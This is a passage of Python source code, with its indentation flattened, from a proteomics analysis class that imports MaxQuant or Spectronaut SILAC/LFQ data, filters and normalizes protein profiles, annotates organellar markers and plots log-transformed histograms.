marker_table = pd.read_csv(pkg_resources.resource_stream(__name__, 'annotations/complexes/{}.csv'.format("Homo sapiens - Uniprot")))
self.markerproteins = {k: v.replace(" ", "").split(",") for k,v in zip(marker_table["Cluster"], marker_table["Members - Gene names"])}
else:
assert kwargs["organism"]+".csv" in pkg_resources.resource_listdir(__name__, "annotations/complexes")
marker_table = pd.read_csv(pkg_resources.resource_stream(__name__, 'annotations/complexes/{}.csv'.format(kwargs["organism"])))
self.markerproteins = {k: v.replace(" ", "").split(",") for k,v in zip(marker_table["Cluster"], marker_table["Members - Gene names"])}
self.organism = kwargs["organism"]
del kwargs["organism"]
self.analysed_datasets_dict = {}
self.analysis_summary_dict = {}
def data_reading(self, filename=None, content=None):
"""
Data import. Can read the df_original from a file or buffer.
        df_original contains all information of the raw file; a tab-separated file is imported.
Args:
self:
filename: string
            imported_columns : dictionary; columns that correspond to this regular expression will be imported
filename: default None, to use the class attribute. Otherwise overwrites the class attribute upon success.
content: default None, to use the filename. Any valid input to pd.read_csv can be provided, e.g. a StringIO buffer.
Returns:
            self.df_original: raw, unprocessed dataframe, single level column index
"""
# use instance attribute if no filename is provided
if filename is None:
filename = self.filename
# if no buffer is provided for the content read straight from the file
if content is None:
content = filename
if filename.endswith("xls") or filename.endswith("txt"):
self.df_original = pd.read_csv(content, sep="\t", comment="#", usecols=lambda x: bool(re.match(self.imported_columns, x)), low_memory = True)
else: #assuming csv file
self.df_original = pd.read_csv(content, sep=",", comment="#", usecols=lambda x: bool(re.match(self.imported_columns, x)), low_memory = True)
assert self.df_original.shape[0]>10 and self.df_original.shape[1]>5
self.filename = filename
return self.df_original
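# Hedged example (an illustrative assumption, not part of the original code): data_reading accepts
# a file path or any buffer that pd.read_csv understands, e.g. an io.StringIO object holding
# tab-separated MaxQuant output ("uploaded_bytes" is a hypothetical variable):
#   import io
#   buffer = io.StringIO(uploaded_bytes.decode("utf-8"))
#   df_raw = ds.data_reading(filename="proteinGroups.txt", content=buffer)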
def processingdf(self, name_pattern=None, summed_MSMS_counts=None, consecutiveLFQi=None, RatioHLcount=None, RatioVariability=None, custom_columns=None, custom_normalized=None):
"""
Analysis of the SILAC/LFQ-MQ/LFQ-Spectronaut data will be performed. The dataframe will be filtered, normalized, and converted into a dataframe,
characterized by a flat column index. These tasks are performed by the following functions:
indexingdf(df_original, acquisition_set_dict, acquisition, fraction_dict, name_pattern)
spectronaut_LFQ_indexingdf(df_original, Spectronaut_columnRenaming, acquisition_set_dict, acquisition, fraction_dict, name_pattern)
stringency_silac(df_index)
normalization_01_silac(df_stringency_mapfracstacked):
logarithmization_silac(df_stringency_mapfracstacked):
stringency_lfq(df_index):
normalization_01_lfq(df_stringency_mapfracstacked):
logarithmization_lfq(df_stringency_mapfracstacked):
Args:
self.acquisition: string, "LFQ6 - Spectronaut", "LFQ5 - Spectronaut", "LFQ5 - MQ", "LFQ6 - MQ", "SILAC - MQ"
additional arguments can be used to override the value set by the class init function
Returns:
self:
map_names: list of Map names
df_01_stacked: df; 0-1 normalized data with "normalized profile" as column name
df_log_stacked: df; log transformed data
analysis_summary_dict["0/1 normalized data - mean"] : 0/1 normalized data across all maps by calculating the mean
["changes in shape after filtering"]
["Unique Proteins"] : unique proteins, derived from the first entry of Protein IDs, seperated by a ";"
["Analysis parameters"] : {"acquisition" : ...,
"filename" : ...,
#SILAC#
"Ratio H/L count 1 (>=X)" : ...,
"Ratio H/L count 2 (>=Y, var<Z)" : ...,
"Ratio variability (<Z, count>=Y)" : ...
#LFQ#
"consecutive data points" : ...,
"summed MS/MS counts" : ...
}
"""
if name_pattern is None:
name_pattern = self.name_pattern
if self.acquisition == "SILAC - MQ":
if RatioHLcount is None:
RatioHLcount = self.RatioHLcount
if RatioVariability is None:
RatioVariability = self.RatioVariability
elif self.acquisition == "Custom":
if custom_columns is None:
custom_columns = self.custom_columns
if custom_normalized is None:
custom_normalized = self.custom_normalized
else:
if summed_MSMS_counts is None:
summed_MSMS_counts = self.summed_MSMS_counts
if consecutiveLFQi is None:
consecutiveLFQi = self.consecutiveLFQi
shape_dict = {}
def indexingdf():
"""
For data output from MaxQuant, all columns - except for "MS/MS count" and "LFQ intensity" (LFQ) | "Ratio H/L count", "Ratio H/L variability [%]"
(SILAC) - will be set as index. A multiindex will be generated, containing "Set" ("MS/MS count", "LFQ intensity"| "Ratio H/L count", "Ratio H/L
variability [%]"), "Fraction" (= defined via "name_pattern") and "Map" (= defined via "name_pattern") as level names, allowing the stacking and
unstacking of the dataframe. The dataframe will be filtered by removing matches to the reverse database, matches only identified by site, and
potential contaminants.
Args:
self:
df_original: dataframe, columns defined through self.imported_columns
acquisition_set_dict: dictionary, all columns will be set as index, except for those that are listed in acquisition_set_dict
acquisition: string, one of "LFQ6 - Spectronaut", "LFQ5 - Spectronaut", "LFQ5 - MQ", "LFQ6 - MQ", "SILAC - MQ"
fraction_dict: "Fraction" is part of the multiindex; fraction_dict allows the renaming of the fractions e.g. 3K -> 03K
name_pattern: regular expression, to identify Map-Fraction-(Replicate)
Returns:
self:
df_index: multiindex dataframe, which contains 3 level labels: Map, Fraction, Type
shape_dict["Original size"] of df_original
shape_dict["Shape after categorical filtering"] of df_index
fractions: list of fractions e.g. ["01K", "03K", ...]
"""
df_original = self.df_original.copy()
df_original.rename({"Proteins": "Protein IDs"}, axis=1, inplace=True)
df_original = df_original.set_index([col for col in df_original.columns
if any([re.match(s, col) for s in self.acquisition_set_dict[self.acquisition]]) == False])
# a multiindex will be generated by extracting the information about Map, Fraction and Set from each individual column name
multiindex = pd.MultiIndex.from_arrays(
arrays=[
[[re.findall(s, col)[0] for s in self.acquisition_set_dict[self.acquisition] if re.match(s,col)][0]
for col in df_original.columns],
[re.match(self.name_pattern, col).group("rep") for col in df_original.columns] if not "<cond>" in self.name_pattern
else ["_".join(re.match(self.name_pattern, col).group("cond", "rep")) for col in df_original.columns],
[re.match(self.name_pattern, col).group("frac") for col in df_original.columns],
],
names=["Set", "Map", "Fraction"]
)
df_original.columns = multiindex
df_original.sort_index(axis=1, inplace=True)
shape_dict["Original size"] = df_original.shape
try:
df_index = df_original.xs(
np.nan, 0, "Reverse")
except:
pass
try:
df_index = df_index.xs(
np.nan, 0, "Potential contaminant")
except:
pass
try:
df_index = df_index.xs(
np.nan, 0, "Only identified by site")
except:
pass
df_index.replace(0, np.nan, inplace=True)
shape_dict["Shape after categorical filtering"] = df_index.shape
df_index.rename(columns={"MS/MS Count":"MS/MS count"}, inplace=True)
fraction_wCyt = list(df_index.columns.get_level_values("Fraction").unique())
##############Cyt should get only be removed if it is not an NMC split
if "Cyt" in fraction_wCyt and len(fraction_wCyt) >= 4:
df_index.drop("Cyt", axis=1, level="Fraction", inplace=True)
try:
if self.acquisition == "LFQ5 - MQ":
df_index.drop("01K", axis=1, level="Fraction", inplace=True)
except:
pass
self.fractions = natsort.natsorted(list(df_index.columns.get_level_values("Fraction").unique()))
self.df_index = df_index
return df_index
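# Hedged illustration (assumed column naming): how the three-level column MultiIndex is derived from
# a MaxQuant column name such as "LFQ intensity Map1_03K" with name_pattern=".* (?P<rep>.*)_(?P<frac>.*)":
#   Set      -> "LFQ intensity"   (matched against acquisition_set_dict)
#   Map      -> "Map1"            (named group "rep", or "<cond>_<rep>" if a condition group is used)
#   Fraction -> "03K"             (named group "frac")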
def custom_indexing_and_normalization():
df_original = self.df_original.copy()
df_original.rename({custom_columns["ids"]: "Protein IDs", custom_columns["genes"]: "Gene names"}, axis=1, inplace=True)
df_original = df_original.set_index([col for col in df_original.columns
if any([re.match(s, col) for s in self.acquisition_set_dict[self.acquisition]]) == False])
# a multiindex will be generated by extracting the information about Map, Fraction and Set from each individual column name
multiindex = pd.MultiIndex.from_arrays(
arrays=[
["normalized profile" for col in df_original.columns],
[re.match(self.name_pattern, col).group("rep") for col in df_original.columns] if not "<cond>" in self.name_pattern
else ["_".join(re.match(self.name_pattern, col).group("cond", "rep")) for col in df_original.columns],
[re.match(self.name_pattern, col).group("frac") for col in df_original.columns],
],
names=["Set", "Map", "Fraction"]
)
df_original.columns = multiindex
df_original.sort_index(axis=1, inplace=True)
shape_dict["Original size"] = df_original.shape
# for custom upload assume full normalization for now. this should be extended to valid value filtering and 0-1 normalization later
df_index = df_original.copy()
self.fractions = natsort.natsorted(list(df_index.columns.get_level_values("Fraction").unique()))
self.df_index = df_index
return df_index
def spectronaut_LFQ_indexingdf():
"""
For data generated with the Spectronaut software, columns will be renamed so that they fit the scheme of MaxQuant output data. Subsequently, all
columns - except for "MS/MS count" and "LFQ intensity" will be set as index. A multiindex will be generated, containing "Set" ("MS/MS count" and
"LFQ intensity"), Fraction" and "Map" (= defined via "name_pattern"; both based on the column name R.condition - equivalent to the column name "Map"
in df_renamed["Map"]) as level labels.
!!!
!!!It is very important to define R.Fraction, R.condition already during the setup of Spectronaut!!!
!!!
Args:
self:
df_original: dataframe, columns defined through self.imported_columns
Spectronaut_columnRenaming
acquisition_set_dict: dictionary, all columns will be set as index, except for those that are listed in acquisition_set_dict
acquisition: string, "LFQ6 - Spectronaut", "LFQ5 - Spectronaut"
fraction_dict: "Fraction" is part of the multiindex; fraction_dict allows the renaming of the fractions e.g. 3K -> 03K
name_pattern: regular expression, to identify Map-Fraction-(Replicate)
Returns:
self:
df_index: multiindex dataframe, which contains 3 level labels: Map, Fraction, Type
shape_dict["Original size"] of df_index
fractions: list of fractions e.g. ["01K", "03K", ...]
"""
df_original = self.df_original.copy()
df_renamed = df_original.rename(columns=self.Spectronaut_columnRenaming)
df_renamed["Fraction"] = [re.match(self.name_pattern, i).group("frac") for i in df_renamed["Map"]]
df_renamed["Map"] = [re.match(self.name_pattern, i).group("rep") for i in df_renamed["Map"]] if not "<cond>" in self.name_pattern else ["_".join(
re.match(self.name_pattern, i).group("cond", "rep")) for i in df_renamed["Map"]]
df_index = df_renamed.set_index([col for col in df_renamed.columns if any([re.match(s, col) for s in self.acquisition_set_dict[self.acquisition]])==False])
df_index.columns.names = ["Set"]
# In case fractionated data was used, this needs to be caught and aggregated
try:
df_index = df_index.unstack(["Map", "Fraction"])
except ValueError:
df_index = df_index.groupby(by=df_index.index.names).agg(np.nansum, axis=0)
df_index = df_index.unstack(["Map", "Fraction"])
df_index.replace(0, np.nan, inplace=True)
shape_dict["Original size"]=df_index.shape
fraction_wCyt = list(df_index.columns.get_level_values("Fraction").unique())
#Cyt is removed only if it is not an NMC split
if "Cyt" in fraction_wCyt and len(fraction_wCyt) >= 4:
df_index.drop("Cyt", axis=1, level="Fraction", inplace=True)
try:
if self.acquisition == "LFQ5 - Spectronaut":
df_index.drop("01K", axis=1, level="Fraction", inplace=True)
except:
pass
self.fractions = natsort.natsorted(list(df_index.columns.get_level_values("Fraction").unique()))
self.df_index = df_index
return df_index
def stringency_silac(df_index):
"""
The multiindex dataframe is subjected to stringency filtering. Only proteins with complete profiles are considered (e.g. a set of 5 SILAC ratios
if there are 5 fractions; any protein with missing values is rejected). Proteins are retained with 3 or more quantifications in each
subfraction (=count). Furthermore, proteins with only 2 quantification events in one or more subfractions are retained if the ratio variability of
the ratios obtained from those 2 quantification events is below 30% (=var). SILAC ratios are linearly normalized by division through the fraction
median, i.e. normalized to SILAC loading. Data is annotated based on the specified marker set, e.g. eLife.
Args:
df_index: multiindex dataframe, which contains 3 level labels: MAP, Fraction, Type
RatioHLcount: int, 2
RatioVariability: int, 30
df_organellarMarkerSet: df, columns: "Gene names", "Compartment", no index
fractions: list of fractions e.g. ["01K", "03K", ...]
Returns:
df_stringency_mapfracstacked: dataframe, in which "MAP" and "Fraction" are stacked;
columns "Ratio H/L count", "Ratio H/L variability [%]", and "Ratio H/L" stored as single level indices
shape_dict["Shape after Ratio H/L count (>=3)/var (count>=2, var<30) filtering"] of df_countvarfiltered_stacked
shape_dict["Shape after filtering for complete profiles"] of df_stringency_mapfracstacked
"""
# Fraction and Map will be stacked
df_stack = df_index.stack(["Fraction", "Map"])
# filtering for a sufficient number of quantifications (count in "Ratio H/L count"), taking the variability (var in "Ratio H/L variability [%]") into account
# zip: allows direct comparison of count and var
# only if the filtering parameters are fulfilled the data will be introduced into df_countvarfiltered_stacked
#default setting: RatioHLcount = 2 ; RatioVariability = 30
df_countvarfiltered_stacked = df_stack.loc[[count>RatioHLcount or (count==RatioHLcount and var<RatioVariability)
for var, count in zip(df_stack["Ratio H/L variability [%]"], df_stack["Ratio H/L count"])]]
shape_dict["Shape after Ratio H/L count (>=3)/var (count==2, var<30) filtering"] = df_countvarfiltered_stacked.unstack(["Fraction", "Map"]).shape
# "Ratio H/L":normalization to SILAC loading, each individual experiment (FractionXMap) will be divided by its median
# np.nanmedian: only entries that are not NaN are considered
df_normsilac_stacked = df_countvarfiltered_stacked["Ratio H/L"]\
.unstack(["Fraction", "Map"])\
.apply(lambda x: x/np.nanmedian(x), axis=0)\
.stack(["Map", "Fraction"])
df_stringency_mapfracstacked = df_countvarfiltered_stacked[["Ratio H/L count", "Ratio H/L variability [%]"]].join(
pd.DataFrame(df_normsilac_stacked, columns=["Ratio H/L"]))
# the dataframe is grouped by (Map, id), which allows filtering for complete profiles
df_stringency_mapfracstacked = df_stringency_mapfracstacked.groupby(["Map", "id"]).filter(lambda x: len(x)>=len(self.fractions))
shape_dict["Shape after filtering for complete profiles"]=df_stringency_mapfracstacked.unstack(["Fraction", "Map"]).shape
# Ratio H/L is converted into Ratio L/H
df_stringency_mapfracstacked["Ratio H/L"] = df_stringency_mapfracstacked["Ratio H/L"].transform(lambda x: 1/x)
#Annotation with marker genes
df_organellarMarkerSet = self.df_organellarMarkerSet
df_stringency_mapfracstacked.reset_index(inplace=True)
df_stringency_mapfracstacked = df_stringency_mapfracstacked.merge(df_organellarMarkerSet, how="left", on="Gene names")
df_stringency_mapfracstacked.set_index([c for c in df_stringency_mapfracstacked.columns
if c not in ["Ratio H/L count","Ratio H/L variability [%]","Ratio H/L"]], inplace=True)
df_stringency_mapfracstacked.rename(index={np.nan:"undefined"}, level="Compartment", inplace=True)
return df_stringency_mapfracstacked
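# Hedged worked example of the count/variability filter above (values are made up; defaults
# RatioHLcount=2, RatioVariability=30):
#   Ratio H/L count = 3, variability = 45 %  -> kept    (count > RatioHLcount)
#   Ratio H/L count = 2, variability = 25 %  -> kept    (count == RatioHLcount and var < RatioVariability)
#   Ratio H/L count = 2, variability = 40 %  -> dropped
#   Ratio H/L count = 1, variability =  5 %  -> dropped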
def normalization_01_silac(df_stringency_mapfracstacked):
"""
The multiindex dataframe, that was subjected to stringency filtering, is 0-1 normalized ("Ratio H/L").
Args:
df_stringency_mapfracstacked: dataframe, in which "Map" and "Fraction" are stacked;
columns "Ratio H/L count", "Ratio H/L variability [%]", and "Ratio H/L" stored as single level indices
self:
fractions: list of fractions e.g. ["01K", "03K", ...]
data_completeness: series, for each individual map, as well as combined maps: 1 - (percentage of NANs)
Returns:
df_01_stacked: dataframe, in which "MAP" and "Fraction" are stacked; data in the column "Ratio H/L" is 0-1 normalized and renamed to "normalized
profile"; the columns "Ratio H/L count", "Ratio H/L variability [%]", and "normalized profile" stored as single level indices;
plotting is possible now
self:
analysis_summary_dict["Data/Profile Completeness"] : df, with information about Data/Profile Completeness
column: "Experiment", "Map", "Data completeness", "Profile completeness"
no row index
"""
df_01norm_unstacked = df_stringency_mapfracstacked["Ratio H/L"].unstack("Fraction")
# 0:1 normalization of Ratio L/H
df_01norm_unstacked = df_01norm_unstacked.div(df_01norm_unstacked.sum(axis=1), axis=0)
df_01_stacked = df_stringency_mapfracstacked[["Ratio H/L count", "Ratio H/L variability [%]"]].join(pd.DataFrame
(df_01norm_unstacked.stack("Fraction"),columns=["Ratio H/L"]))
# "Ratio H/L" will be renamed to "normalized profile"
df_01_stacked.columns = [col if col!="Ratio H/L" else "normalized profile" for col in df_01_stacked.columns]
return df_01_stacked
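# Hedged numeric sketch of the 0-1 normalization above (toy values): an inverted-ratio profile of
# [2, 1, 1] across three fractions sums to 4 and becomes [0.5, 0.25, 0.25], i.e. every protein
# profile sums to 1 across its fractions.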
def logarithmization_silac(df_stringency_mapfracstacked):
"""
The multiindex dataframe, that was subjected to stringency filtering, is logarithmized ("Ratio H/L").
Args:
df_stringency_mapfracstacked: dataframe, in which "MAP" and "Fraction" are stacked; the columns "Ratio H/L count", "Ratio H/L variability [%]",
and "Ratio H/L" stored as single level indices
Returns:
df_log_stacked: dataframe, in which "MAP" and "Fraction" are stacked; data in the column "log profile" originates from logarithmized "Ratio H/L"
data; the columns "Ratio H/L count", "Ratio H/L variability [%]" and "log profile" are stored as single level indices;
PCA is possible now
"""
# logarithmizing, basis of 2
df_lognorm_ratio_stacked = df_stringency_mapfracstacked["Ratio H/L"].transform(np.log2)
df_log_stacked = df_stringency_mapfracstacked[["Ratio H/L count", "Ratio H/L variability [%]"]].join(
pd.DataFrame(df_lognorm_ratio_stacked, columns=["Ratio H/L"]))
# "Ratio H/L" will be renamed to "log profile"
df_log_stacked.columns = [col if col !="Ratio H/L" else "log profile" for col in df_log_stacked.columns]
return df_log_stacked
def stringency_lfq(df_index):
"""
The multiindex dataframe is subjected to stringency filtering. Only proteins that were identified with
at least [4] consecutive data points for "LFQ intensity" and whose summed MS/MS counts are >= n(fractions)*[2]
(LFQ5: min 10 and LFQ6: min 12, respectively; coverage filtering) are included.
Data is annotated based on specified marker set e.g. eLife.
Args:
df_index: multiindex dataframe, which contains 3 level labels: Map, Fraction, Type
self:
df_organellarMarkerSet: df, columns: "Gene names", "Compartment", no index
fractions: list of fractions e.g. ["01K", "03K", ...]
summed_MSMS_counts: int, 2
consecutiveLFQi: int, 4
Returns:
df_stringency_mapfracstacked: dataframe, in which "Map" and "Fraction" is stacked; "LFQ intensity" and "MS/MS count" define a
single-level column index
self:
shape_dict["Shape after MS/MS value filtering"] of df_mscount_mapstacked
shape_dict["Shape after consecutive value filtering"] of df_stringency_mapfracstacked
"""
df_index = df_index.stack("Map")
# sorting the level 0, in order to have LFQ intensity - MS/MS count instead of continuous alternation
df_index.sort_index(axis=1, level=0, inplace=True)
# "MS/MS count"-column: take the sum over the fractions; if the sum is larger than n[fraction]*2, it will be stored in the new dataframe
minms = (len(self.fractions) * self.summed_MSMS_counts)
if minms > 0:
df_mscount_mapstacked = df_index.loc[df_index[("MS/MS count")].apply(np.sum, axis=1) >= minms]
shape_dict["Shape after MS/MS value filtering"]=df_mscount_mapstacked.unstack("Map").shape
df_stringency_mapfracstacked = df_mscount_mapstacked.copy()
else:
df_stringency_mapfracstacked = df_index.copy()
# a boolean mask (a series, not a dataframe) is generated; rows with at least consecutiveLFQi (e.g. 4) consecutive non-NaN values are retained
df_stringency_mapfracstacked.sort_index(level="Fraction", axis=1, key=natsort_index_keys, inplace=True)
df_stringency_mapfracstacked = df_stringency_mapfracstacked.loc[
df_stringency_mapfracstacked[("LFQ intensity")]\
.apply(lambda x: np.isfinite(x), axis=0)\
.apply(lambda x: sum(x) >= self.consecutiveLFQi and any(x.rolling(window=self.consecutiveLFQi).sum() >= self.consecutiveLFQi), axis=1)]
shape_dict["Shape after consecutive value filtering"]=df_stringency_mapfracstacked.unstack("Map").shape
df_stringency_mapfracstacked = df_stringency_mapfracstacked.copy().stack("Fraction")
#Annotation with marker genes
df_organellarMarkerSet = self.df_organellarMarkerSet
df_stringency_mapfracstacked.reset_index(inplace=True)
df_stringency_mapfracstacked = df_stringency_mapfracstacked.merge(df_organellarMarkerSet, how="left", on="Gene names")
df_stringency_mapfracstacked.set_index([c for c in df_stringency_mapfracstacked.columns
if c!="MS/MS count" and c!="LFQ intensity"], inplace=True)
df_stringency_mapfracstacked.rename(index={np.nan : "undefined"}, level="Compartment", inplace=True)
return df_stringency_mapfracstacked
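# Hedged illustration of the consecutive-value filter above (toy profiles, consecutiveLFQi=4):
#   [NaN, 1.0, 2.0, 3.0, 4.0, NaN]  -> kept    (a run of 4 finite values)
#   [1.0, NaN, 2.0, 3.0, 4.0, NaN]  -> dropped (4 finite values, but only 3 in a row)
# The rolling window sums a boolean mask of finite values; a window sum equal to consecutiveLFQi
# marks an uninterrupted run of that length.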
def normalization_01_lfq(df_stringency_mapfracstacked):
"""
The multiindex dataframe, that was subjected to stringency filtering, is 0-1 normalized ("LFQ intensity").
Args:
df_stringency_mapfracstacked: dataframe, in which "Map" and "Fraction" is stacked, "LFQ intensity" and "MS/MS count" define a
single-level column index
self:
fractions: list of fractions e.g. ["01K", "03K", ...]
Returns:
df_01_stacked: dataframe, in which "MAP" and "Fraction" are stacked; data in the column "LFQ intensity" is 0-1 normalized and renamed to
"normalized profile"; the columns "normalized profile" and "MS/MS count" are stored as single level indices; plotting is possible now
"""
df_01norm_mapstacked = df_stringency_mapfracstacked["LFQ intensity"].unstack("Fraction")
# 0-1 normalization of LFQ intensity
df_01norm_unstacked = df_01norm_mapstacked.div(df_01norm_mapstacked.sum(axis=1), axis=0)
df_rest = df_stringency_mapfracstacked.drop("LFQ intensity", axis=1)
df_01_stacked = df_rest.join(pd.DataFrame(df_01norm_unstacked.stack(
"Fraction"),columns=["LFQ intensity"]))
# rename columns: "LFQ intensity" into "normalized profile"
df_01_stacked.columns = [col if col!="LFQ intensity" else "normalized profile" for col in
df_01_stacked.columns]
#imputation
df_01_stacked = df_01_stacked.unstack("Fraction").replace(np.NaN, 0).stack("Fraction")
df_01_stacked = df_01_stacked.sort_index()
return df_01_stacked
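# Note on the imputation step above: remaining NaNs are replaced by 0 after 0-1 normalization,
# i.e. missing fractions are treated as "not detected" rather than dropped.
# Hedged toy example: [10, NaN, 30] -> normalized [0.25, NaN, 0.75] -> imputed [0.25, 0, 0.75].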
def logarithmization_lfq(df_stringency_mapfracstacked):
"""The multiindex dataframe, that was subjected to stringency filtering, is logarithmized ("LFQ intensity").
Args:
df_stringency_mapfracstacked: dataframe, in which "Map" and "Fraction" is stacked; "LFQ intensity" and "MS/MS count" define a
single-level column index
Returns:
df_log_stacked: dataframe, in which "MAP" and "Fraction" are stacked; data in the column "log profile" originates from logarithmized
"LFQ intensity"; the columns "log profile" and "MS/MS count" are stored as single level indices; PCA is possible now
"""
df_lognorm_ratio_stacked = df_stringency_mapfracstacked["LFQ intensity"].transform(np.log2)
df_rest = df_stringency_mapfracstacked.drop("LFQ intensity", axis=1)
df_log_stacked = df_rest.join(pd.DataFrame(df_lognorm_ratio_stacked, columns=["LFQ intensity"]))
# "LFQ intensity" will be renamed to "log profile"
df_log_stacked.columns = [col if col!="LFQ intensity" else "log profile" for col in df_log_stacked.columns]
return df_log_stacked
def split_ids_uniprot(el):
"""
This finds the primary canonical protein ID in the protein group. If no canonical ID is present, it selects the first isoform ID.
"""
p1 = el.split(";")[0]
if "-" not in p1:
return p1
else:
p = p1.split("-")[0]
if p in el.split(";"):
return p
else:
return p1
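# Hedged examples of split_ids_uniprot (derived from the logic above; the IDs are made up):
#   "P63261;P60709"         -> "P63261"    (first entry is already a canonical ID)
#   "P63261-2;P63261;Q123"  -> "P63261"    (isoform suffix stripped, base ID is present in the group)
#   "P63261-2;Q12345"       -> "P63261-2"  (base ID absent, keep the first isoform ID)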
if self.acquisition == "SILAC - MQ":
# Index data
df_index = indexingdf()
map_names = df_index.columns.get_level_values("Map").unique()
self.map_names = map_names
# Run stringency filtering and normalization
df_stringency_mapfracstacked = stringency_silac(df_index)
self.df_stringencyFiltered = df_stringency_mapfracstacked
self.df_01_stacked = normalization_01_silac(df_stringency_mapfracstacked)
self.df_log_stacked = logarithmization_silac(df_stringency_mapfracstacked)
# format and reduce 0-1 normalized data for comparison with other experiments
df_01_comparison = self.df_01_stacked.copy()
comp_ids = pd.Series([split_ids_uniprot(el) for el in df_01_comparison.index.get_level_values("Protein IDs")], name="Protein IDs")
df_01_comparison.index = df_01_comparison.index.droplevel("Protein IDs")
df_01_comparison.set_index(comp_ids, append=True, inplace=True)
df_01_comparison.drop(["Ratio H/L count", "Ratio H/L variability [%]"], inplace=True, axis=1)
df_01_comparison = df_01_comparison.unstack(["Map", "Fraction"])
df_01_comparison.columns = ["?".join(el) for el in df_01_comparison.columns.values]
df_01_comparison = df_01_comparison.copy().reset_index().drop(["C-Score", "Q-value", "Score", "Majority protein IDs", "Protein names", "id"], axis=1, errors="ignore")
# populate the analysis summary dictionary with (meta)data
unique_proteins = [split_ids_uniprot(i) for i in set(self.df_01_stacked.index.get_level_values("Protein IDs"))]
unique_proteins.sort()
self.analysis_summary_dict["0/1 normalized data"] = df_01_comparison.to_json()
self.analysis_summary_dict["Unique Proteins"] = unique_proteins
self.analysis_summary_dict["changes in shape after filtering"] = shape_dict.copy()
analysis_parameters = {"acquisition" : self.acquisition,
"filename" : self.filename,
"comment" : self.comment,
"Ratio H/L count" : self.RatioHLcount,
"Ratio variability" : self.RatioVariability,
"organism" : self.organism,
}
self.analysis_summary_dict["Analysis parameters"] = analysis_parameters.copy()
# TODO this line needs to be removed.
self.analysed_datasets_dict[self.expname] = self.analysis_summary_dict.copy()
elif self.acquisition == "LFQ5 - MQ" or self.acquisition == "LFQ6 - MQ" or self.acquisition == "LFQ5 - Spectronaut" or self.acquisition == "LFQ6 - Spectronaut":
#if not summed_MS_counts:
# summed_MS_counts = self.summed_MS_counts
#if not consecutiveLFQi:
# consecutiveLFQi = self.consecutiveLFQi
if self.acquisition == "LFQ5 - MQ" or self.acquisition == "LFQ6 - MQ":
df_index = indexingdf()
elif self.acquisition == "LFQ5 - Spectronaut" or self.acquisition == "LFQ6 - Spectronaut":
df_index = spectronaut_LFQ_indexingdf()
map_names = df_index.columns.get_level_values("Map").unique()
self.map_names = map_names
df_stringency_mapfracstacked = stringency_lfq(df_index)
self.df_stringencyFiltered = df_stringency_mapfracstacked
self.df_log_stacked = logarithmization_lfq(df_stringency_mapfracstacked)
self.df_01_stacked = normalization_01_lfq(df_stringency_mapfracstacked)
df_01_comparison = self.df_01_stacked.copy()
comp_ids = pd.Series([split_ids_uniprot(el) for el in df_01_comparison.index.get_level_values("Protein IDs")], name="Protein IDs")
df_01_comparison.index = df_01_comparison.index.droplevel("Protein IDs")
df_01_comparison.set_index(comp_ids, append=True, inplace=True)
df_01_comparison.drop("MS/MS count", inplace=True, axis=1, errors="ignore")
df_01_comparison = df_01_comparison.unstack(["Map", "Fraction"])
df_01_comparison.columns = ["?".join(el) for el in df_01_comparison.columns.values]
df_01_comparison = df_01_comparison.copy().reset_index().drop(["C-Score", "Q-value", "Score", "Majority protein IDs", "Protein names", "id"], axis=1, errors="ignore")
self.analysis_summary_dict["0/1 normalized data"] = df_01_comparison.to_json()#double_precision=4) #.reset_index()
unique_proteins = [split_ids_uniprot(i) for i in set(self.df_01_stacked.index.get_level_values("Protein IDs"))]
unique_proteins.sort()
self.analysis_summary_dict["Unique Proteins"] = unique_proteins
self.analysis_summary_dict["changes in shape after filtering"] = shape_dict.copy()
analysis_parameters = {"acquisition" : self.acquisition,
"filename" : self.filename,
"comment" : self.comment,
"consecutive data points" : self.consecutiveLFQi,
"summed MS/MS counts" : self.summed_MSMS_counts,
"organism" : self.organism,
}
self.analysis_summary_dict["Analysis parameters"] = analysis_parameters.copy()
self.analysed_datasets_dict[self.expname] = self.analysis_summary_dict.copy()
#return self.df_01_stacked
elif self.acquisition == "Custom":
df_index = custom_indexing_and_normalization()
map_names = df_index.columns.get_level_values("Map").unique()
self.map_names = map_names
df_01_stacked = df_index.stack(["Map", "Fraction"])
df_01_stacked = df_01_stacked.reset_index().merge(self.df_organellarMarkerSet, how="left", on="Gene names")
df_01_stacked.set_index([c for c in df_01_stacked.columns if c not in ["normalized profile"]], inplace=True)
df_01_stacked.rename(index={np.nan:"undefined"}, level="Compartment", inplace=True)
self.df_01_stacked = df_01_stacked
df_01_comparison = self.df_01_stacked.copy()
comp_ids = pd.Series([split_ids_uniprot(el) for el in df_01_comparison.index.get_level_values("Protein IDs")], name="Protein IDs")
df_01_comparison.index = df_01_comparison.index.droplevel("Protein IDs")
df_01_comparison.set_index(comp_ids, append=True, inplace=True)
df_01_comparison.drop("MS/MS count", inplace=True, axis=1, errors="ignore")
df_01_comparison = df_01_comparison.unstack(["Map", "Fraction"])
df_01_comparison.columns = ["?".join(el) for el in df_01_comparison.columns.values]
df_01_comparison = df_01_comparison.copy().reset_index().drop(["C-Score", "Q-value", "Score", "Majority protein IDs", "Protein names", "id"], axis=1, errors="ignore")
self.analysis_summary_dict["0/1 normalized data"] = df_01_comparison.to_json()#double_precision=4) #.reset_index()
unique_proteins = [split_ids_uniprot(i) for i in set(self.df_01_stacked.index.get_level_values("Protein IDs"))]
unique_proteins.sort()
self.analysis_summary_dict["Unique Proteins"] = unique_proteins
self.analysis_summary_dict["changes in shape after filtering"] = shape_dict.copy()
analysis_parameters = {"acquisition" : self.acquisition,
"filename" : self.filename,
"comment" : self.comment,
"organism" : self.organism,
}
self.analysis_summary_dict["Analysis parameters"] = analysis_parameters.copy()
self.analysed_datasets_dict[self.expname] = self.analysis_summary_dict.copy()
else:
return "I do not know this"
def plot_log_data(self):
"""
Args:
self.df_log_stacked
Returns:
log_histogram: Histogram of log transformed data
"""
log_histogram = px.histogram(self.df_log_stacked.reset_index().sort_values(["Map", "Fraction"], key=natsort_list_keys),
x="log profile",
facet_col="Fraction",
facet_row="Map",
template="simple_white",
labels={"log profile": "log tranformed data ({})".format("LFQ intenisty" if self.acquisition != "SILAC - MQ" else "Ratio H/L")}
)
log_histogram.for_each_xaxis(lambda axis: axis.update(title={"text":""}))
log_histogram.for_each_yaxis(lambda axis: axis.update(title={"text":""}))
log_histogram.add_annotation(x=0.5, y=0, yshift=-50, xref="paper",showarrow=False, yref="paper",
text="log2(LFQ intensity)")
log_histogram.add_annotation(x=0, y=0.5, textangle=270, xref="paper",showarrow=False, yref="paper", xshift=-50,
text="count")
